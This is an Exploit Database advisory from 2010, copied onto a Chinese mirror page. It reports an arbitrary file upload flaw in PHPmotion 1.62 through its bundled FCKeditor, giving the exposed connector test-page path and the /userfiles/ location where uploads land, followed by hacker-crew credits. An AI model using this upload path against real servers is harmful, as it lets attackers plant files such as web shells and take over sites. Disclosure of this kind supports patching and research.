PHPmotion 1.62 – ‘FCKeditor’ Arbitrary File Upload

• Exploit Database
• 15 阅读

• 作者： trycyber
  日期： 2010-11-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15602/

• -----------------------------------------------------------------------
  phpmotion/FCKeditorFile upload vulnerabilities
  -----------------------------------------------------------------------
  Author		: trycyber (trycyber@magelangcyber.com)
  Homepage	: http://indonesiancoder.com,magelangcyber.web.id
  Vendor		: http://www.phpmotion.com/
  Dork		: CIHUY ;p
  Version 	: 1.62
  Tested on	: Win Xp sp2	
  Date		: November 23, 2010
  -----------------------------------------------------------------------
  
  I.POC & Exploit
  -----------------------------------------------------------------------
  Default 	:	http://127.0.0.1/
  
  
  exploit 	:	http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
  			
  
  results in	:	http://127.0.0.1/userfiles/name of file	 
  
  
  ------------------------------------------------------------------------
  Credits
  ------------------------------------------------------------------------
  Allahu Akbar
  INDONESIAN CODER ~ Magelangcyber-team ~ Kill-9 Crew ~ MC Crew
  Don Tukulesto ~ kaMtiEz ~ ibl13z ~ Jundab ~ N4ck0 ~ Yurakha ~ aN93l1c ~Mboys ~ Contrex ~n4KuLa_
  k4L0ng666 ~ Xr0b0t ~ Adipati ~ Arianom ~ t3ll0 ~ cimpli ~ Pathloader
  
  -------------------------------------------------------------------------
  "aku belajar bukan karenamu, melainkan aku ingin aku menjadi aku"
  
  Indonesiancoder family & Magelangcyber family